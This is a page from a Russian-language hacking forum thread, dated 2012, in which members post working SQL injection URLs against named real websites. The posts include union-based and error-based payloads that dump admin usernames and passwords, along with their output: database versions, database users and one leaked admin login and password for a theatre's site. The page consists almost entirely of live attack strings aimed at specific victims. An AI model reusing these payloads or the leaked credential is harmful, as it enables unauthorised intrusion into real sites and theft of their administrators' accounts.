HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #14841  
Старый 13.04.2012, 00:33
Га-Ноцри
Guest
Сообщений: n/a
Провел на форуме:
103014

Репутация: 76
По умолчанию

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.aussiewolf.hu/index.php?id=40+union+select+concat_ws(database(),user(),version())--[/COLOR][/COLOR] 
 
Ответить с цитированием

  #14842  
Старый 13.04.2012, 04:47
Bb0y
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224

Репутация: 388
Отправить сообщение для Bb0y с помощью ICQ Отправить сообщение для Bb0y с помощью Yahoo
По умолчанию

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//threadandco.com/shop.php?id=42+union+select+1,concat_ws(0x3,id,0x3a,username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+admin--[/COLOR][/COLOR] 
----------------------------------------------up

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.glenferrie.com.au/shop.php?id=42+union+select+1,group_concat(0x0b,id,0x3a,user_name,0x3a,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+login_admin+--

[/COLOR][/COLOR
 
Ответить с цитированием

  #14843  
Старый 13.04.2012, 17:27
nemaniak
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919

Репутация: 229
По умолчанию

temi.provincia.milano.it PR-7

Код:
Code:
http://temi.provincia.milano.it/donne/news/newst.php?news=-12260+UnIon+selECt+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version(),user(),database()),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84+--+
Код:
Code:
5.0.77-log:donne@10.120.192.16:d_portale
allotment.org.uk PR-5 Alexa-49k

Код:
Code:
http://www.allotment.org.uk/diary/diary_day_detail.php?item=(348)and(select+1+from(select+count(*),concat(select+concat_ws(0x3a,version(),user(),database()+limit+0,1),floor(rand(0)*2)x+from+information_schema.tables+group+by+x)a)--
Код:
Code:
5.0.95-community:lotty_1@localhost:lotty_11
gemseducation.com PR-5 Alexa-182k

Код:
Code:
www.gemseducation.com/MENASA/gwa0029/contents.php?pageid=-712+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--
Код:
Code:
5.0.77:gemsDBusr@localhost:gemseducation1
 
Ответить с цитированием

  #14844  
Старый 13.04.2012, 19:28
kise
Guest
Сообщений: n/a
Провел на форуме:
17281

Репутация: -4
По умолчанию

cy 60, pr 4, dmoz

http://life-prog.ru/view_video.php?id=-21%27+union+select+1,2,3,version%28%29,5,6+--+f
 
Ответить с цитированием

  #14845  
Старый 14.04.2012, 16:04
mst
Guest
Сообщений: n/a
Провел на форуме:
655

Репутация: 0
По умолчанию

Цитата:
Сообщение от None  
http://www.cheatsahoy.com/cheatsheet.php?gid=79-9.999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17--
Injectable column: 2

Version: 5.0.91-log

Tables count: 1

TucR - 10:3

SELECT database(): cheatsah_games

________________________________________

Омский государственный театр драмы

Цитата:
Сообщение от None  
http://www.omskdrama.ru/wwwroot/index.php?gid=59-9.999+union+select+1,2,3,4,5,6,7--
Injectable column: 3

Version: 5.1.61-0+squeeze1-log

Tables count: 33

adminlogin,adminpassword FROM admins - Admin211140:h18kUYP3

TucR - 300:3

SELECT database(): z106032_omskdram
 
Ответить с цитированием

  #14846  
Старый 14.04.2012, 19:50
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640

Репутация: 0
По умолчанию

Тиц 3600

PR 6

Цитата:
Сообщение от None  
http://rusk.ru/viewmessage.php?id=-83619+union+select+1,2,3,4,5,6--+f
Дальше крутить совесть и религия не позволила
 
Ответить с цитированием

  #14847  
Старый 15.04.2012, 02:28
VY_CMa
Guest
Сообщений: n/a
Провел на форуме:
193811

Репутация: 724
По умолчанию

Цитата:
Сообщение от None  
http://dnevkino.ru/articles/?id=26+order+by+7
Докрутить не смог, вроде фильтрация идёт на уровне хостинга, даёт 403 еррору если в адресе есть union и select. Если кто подопнёт с советом буду рад.
 
Ответить с цитированием

  #14848  
Старый 15.04.2012, 02:42
Га-Ноцри
Guest
Сообщений: n/a
Провел на форуме:
103014

Репутация: 76
По умолчанию

Для любителей велосипедного спорта.

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.ciclisme.cat/calendario_listado.php?modalidad=-1+union+select+1,table_name,3+from+information_schema.tables+where+table_schema=0x6369636C69736D655F66656465636174--[/COLOR][/COLOR] 
 
Ответить с цитированием

  #14849  
Старый 15.04.2012, 12:17
mst
Guest
Сообщений: n/a
Провел на форуме:
655

Репутация: 0
По умолчанию

Цитата:
Сообщение от None  
http://www.invictory.com.ua/tips_issue.php?id=7-9.999+union+select+1,2,3,4,5,6--
Injectable column: 3
Version: 5.0.95-community:cR - 20:4

SELECT database(): ivcomua_db:cR - 20:2

================================================

Продажа телефонов -)

Цитата:
Сообщение от None  
http://www.phoneline.com.ua/product.php?id=479-9.999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
Injectable column: 5

Version: 5.0.87.d10-ourdelta-log

Tables count: 12

TucR - 10:1

Admin directory may be here: /admin.php

SELECT database(): Andry_phoneline
 
Ответить с цитированием

  #14850  
Старый 15.04.2012, 12:45
Unknown
Guest
Сообщений: n/a
Провел на форуме:
129743

Репутация: 92
По умолчанию

Код:
Code:
http://www.statusx.ru/index.php?status=1+and+substring(@@version,1,1)=5
Код:
Code:
http://www.kmsmuseum.ru/news.php?status=1&id=28+and+substring(@@version,1,1)=5
Код:
Code:
http://www.lessons.jet-host.ru/product.php?status=1+and+1=0+union+Select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6--+
version: 5.5.16-55

database: jetru_6402670_product

user: jetru_6402670@192.168.0.78
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ